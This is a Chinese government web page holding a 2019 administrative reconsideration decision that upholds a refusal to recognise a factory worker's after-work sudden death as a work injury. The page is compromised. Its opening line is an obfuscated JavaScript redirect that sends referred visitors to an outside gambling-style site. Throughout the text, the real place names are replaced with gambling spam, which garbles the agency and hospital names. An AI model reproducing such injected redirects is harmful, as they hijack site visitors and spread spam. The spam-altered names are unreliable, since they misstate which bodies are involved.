var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

bbin宝盈,bbin下载

您的当前位置:首页 > 行政复议
发布日期:2019-10-30 浏览次数: 字号:[ ]

申请人:俞某

被申请人:bbin宝盈,bbin下载:人力资源和社会保障局

第三人:某公司

 

申请人俞某不服被申请人bbin宝盈,bbin下载:人力资源和社会保障局作出的《bbin宝盈,bbin下载:人力资源和社会保障局不予认定工伤认定书》(嘉人社不予工伤认定2018*号),于20181129日向本机关申请复议,请求撤销上述认定书。本机关受理后依法进行了审查,因案情复杂,延期三十日作出决定,现已审理终结。

申请人俞某述称:2018年7月27日,俞某某(俞某父亲)在上班时因身体不适,同事提出就医,被其拒绝,后由同事送到家中。俞某某于7月30日、31日向单位请假休息,8月1日上班。俞某某于8月2日下班回家后出现抽搐,当时曾向俞某述称在单位身体不适,休息过2小时。当晚俞某某经抢救后死亡。同事在灵堂守灵时,向俞某及亲属同样陈述了8月2日俞某某在上班期间的上述情况。俞某认为俞某某的死亡符合《工伤保险条例》第十五条规定,应视作工伤。

被申请人bbin宝盈,bbin下载:人力资源和社会保障局辩称:bbin宝盈,bbin下载:人力资源和社会保障局作出的《bbin宝盈,bbin下载:人力资源和社会保障局不予认定工伤认定书》(嘉人社不予工伤认定2018*号)事实清楚,程序合法,适用法律依据正确。俞某某某公司机加一车间职工2018年8月2日,俞某某06时50分左右到某公司上班,17时30分左右下班回家,17时45分左右回家后感觉身体不适,家属拨打120急救电话送往bbin宝盈,bbin下载:王店人民医院救治。俞某某在送往医院途中因抢救无效死亡,bbin宝盈,bbin下载:王店人民医院诊断死亡原因为:猝死。2018年8月27日,某公司为其职工俞某某bbin宝盈,bbin下载:人力资源和社会保障局申请工伤认定。bbin宝盈,bbin下载:人力资源和社会保障局于同日受理并作出《关于工伤认定限期举证及协助调查核实通知书》(嘉人社工通字[2018]131号)。8月29日,bbin宝盈,bbin下载:人力资源和社会保障局前往某公司机加一车间调查取证,根据bbin宝盈,bbin下载:人力资源和社会保障局某公司调取的俞某某8月2日上班期间的影像资料,并未发现俞某某有出现身体不适的现象。根据bbin宝盈,bbin下载:人力资源和社会保障局对机加一车间的孔某陈某刘某陈某等车间管理人员及周边工友所做的调查笔录,俞某某8月2日上班期间并向工友反映自己身体不适需要前往医院等情况某公司提交了其对机加一车间俞某某8月2日上班期间的情况进行排摸的《排摸表》33名职工均未发现俞某某有出现身体不适需要就医的现象。bbin宝盈,bbin下载:人力资源和社会保障局经审查认为根据《工伤保险条例》第十五条第(一)项,“职工有下列情形之一的,视同工伤:(一)在工作时间和工作岗位,突发疾病死亡或者在48小时之内经抢救无效死亡的;”该视同工伤的情形必须同时符合三个要件,即工作时间、工作岗位和突发疾病。俞某提出的“2018年7月29日俞某某在上班时因身体不适,同事提出就医,被其拒绝……8月1日起恢复上班”与本案没有关联,不属于俞某某8月2日当天突发疾病死亡的范畴根据调查资料显示8月2日上班期间,俞某某并未出现身体不适,故其于17时45分左右回家后感觉身体不适进而突发疾病死亡的情形不符合《工伤保险条例》第十五条第(一)项关于工作时间、工作岗位和突发疾病三个要件的规定。综上,2018年10月25日,bbin宝盈,bbin下载:人力资源和社会保障局作出《不予认定工伤决定书》(嘉人社不予工伤认定[2018]*号),认为俞某某死亡不符合《工伤保险条例》第十五条第(一)项视同工伤的情形,不予认定工伤。

2019115日,本机关依照《中华人民共和国行政复议法实施条例》第三十三条规定就本案举行行政复议听证会,申请人俞某,委托代理人浙江子城律师事务所律师高某,被申请人bbin宝盈,bbin下载:人力资源和社会保障局工作人员厉某,第三人某公司工作人员何某参加听证。俞某与bbin宝盈,bbin下载:人力资源和社会保障局意见均同复议申请书与答复意见书。

本机关查明,俞某某于2015年1月与某公司签订《劳动合同书》,期限从2015年1月1日起至2019年12月31日止,工作内容为:生产操作类。2018年8月2日,某公司《日打卡数据查询》记载,俞某某06时50分上班,17时30分下班。俞某某下班回家后身体不适家属17:49分拨打120急救电话在送往医院途中死亡2018年8月3日,bbin宝盈,bbin下载:王店人民医院作出《居民死亡医学证明(推断)书》,诊断死亡原因为:猝死。2018年8月27日,某公司向bbin宝盈,bbin下载:人力资源和社会保障局提交《工伤认定申请表》,记载:“用人单位意见:同意申报工伤认定”。同日,bbin宝盈,bbin下载:人力资源和社会保障局作出《bbin宝盈,bbin下载:人力资源和社会保障局工伤认定申请受理决定书》(嘉人社工受[2018]131号),受理工伤认定申请,并作出《bbin宝盈,bbin下载:人力资源和社会保障局关于工伤认定限期举证及协助调查核实通知书》(嘉人社工通字[2018]131号)。bbin宝盈,bbin下载:人力资源和社会保障局经调查核实,于2018年10月25日作出bbin宝盈,bbin下载:人力资源和社会保障局不予认定工伤决定书》(嘉人社不予工伤认定[2018]*号),记载“bbin宝盈,bbin下载:人社局工作人员于2018年8月29日前往某公司机加一车间调查取证得知:俞某某于8月2日06时50分左右到公司上班,于17时30分左右下班回家;并当场调取了俞某某在8月2日上班期间的影像资料,并未发现俞某某有出现身体不适的现象;后工作人员对机加一车间的孔某、陈某、刘某、陈某等车间管理人员及周边工友做了调查笔录得知,俞某某在8月2日上班期间并无向工友反映自己身体不适。某公司机加一车间也对俞某某在8月2日上班期间进行了排摸,33名职工都没发现俞某某出现身体不适现象。上述事实有:劳动合同、医疗机构证明材料、俞某某在8月2日上班的影像资料、调查笔录、日打卡数据查询表、排摸表、车间规章制度及工作环境照片等证据证实。综上,俞某某死亡不符合《工伤保险条例》第十四条、第十五条认定工伤或者视同工伤的任何一种情形,现决定不予认定工伤。”俞某不服该认定书,引发本案争议。

以上事实有《bbin宝盈,bbin下载:人力资源和社会保障局不予认定工伤决定书》(嘉人社不予工伤认定[2018]*号居民死亡医学证明(推断)书《劳动合同书》《工伤认定申请表》《嘉兴学院附属第二医院bbin宝盈,bbin下载:第二医院体检报告》《bbin宝盈,bbin下载:医疗机构门诊病历》《bbin宝盈,bbin下载:人力资源和社会保障局工伤认定申请受理决定书》(嘉人社工受[2018]131号)、《bbin宝盈,bbin下载:人力资源和社会保障局关于工伤认定限期举证及协助调查核实通知书》(嘉人社工通字[2018]131号)《日打卡数据查询》《排摸表》《bbin宝盈,bbin下载:人力资源和社会保障局调查笔录》1、《bbin宝盈,bbin下载:人力资源和社会保障局调查笔录》2、《bbin宝盈,bbin下载:人力资源和社会保障局调查笔录》3、《bbin宝盈,bbin下载:人力资源和社会保障局调查笔录》4、视频资料、听证笔录、送达回证等证据为证。

本机关认为,本案争议的焦点系俞某某的死亡是否属于《工伤保险条例》第十五条第(一)项视同工伤的情形。根据《工伤保险条例》第十五条第(一)项,“职工有下列情形之一的,视同工伤:(一)在工作时间和工作岗位,突发疾病死亡或者在48小时之内经抢救无效死亡的;可见,视同工伤的情况必须同时符合三个要件,即工作时间、工作岗位和突发疾病死亡或者突发疾病在48小时内抢救无效死亡的。本案中,bbin宝盈,bbin下载:人力资源和社会保障局在2018年8月27日受理某公司提交的工伤认定申请后,向用人单位某公司及公司职工进行了调查核实,未发现俞某某在8月2日工作时间和工作岗位上,身体有突发疾病。且某公司在提交的工伤认定申请材料中,提供了bbin宝盈,bbin下载:王店人民医院作出的《居民死亡医学证明(推断)书》,诊断死亡原因为猝死,但未能提供材料证明俞某某系因“突发某种疾病”而猝死,故bbin宝盈,bbin下载:人力资源和社会保障局认为俞某某的情形不符合视同工伤认定的条件,故于2018年10月25日作出《bbin宝盈,bbin下载:人力资源和社会保障局不予认定工伤决定书》(嘉人社不予工伤认定[2018]*号),对俞某某不予工伤认定,事实清楚。但bbin宝盈,bbin下载:人力资源和社会保障局在《bbin宝盈,bbin下载:人力资源和社会保障局不予认定工伤决定书》(嘉人社不予工伤认定[2018]*号)送达回证上未让受送达人填写送达日期,本机关予以指正

根据《中华人民共和国行政复议法》第二十八条第一款第(一)项之规定,决定如下:

维持被申请人bbin宝盈,bbin下载:人力资源和社会保障局作出的《bbin宝盈,bbin下载:人力资源和社会保障局不予认定工伤决定书》(嘉人社不予工伤认定[2018]*号)。

申请人俞某如不服本复议决定,可在收到本决定书之日起十五日内向人民法院起诉。

 

 

 

bbin宝盈,bbin下载:人民政府

                                  2019224





打印本页 关闭窗口
Produced By 大汉网络 大汉版通发布系统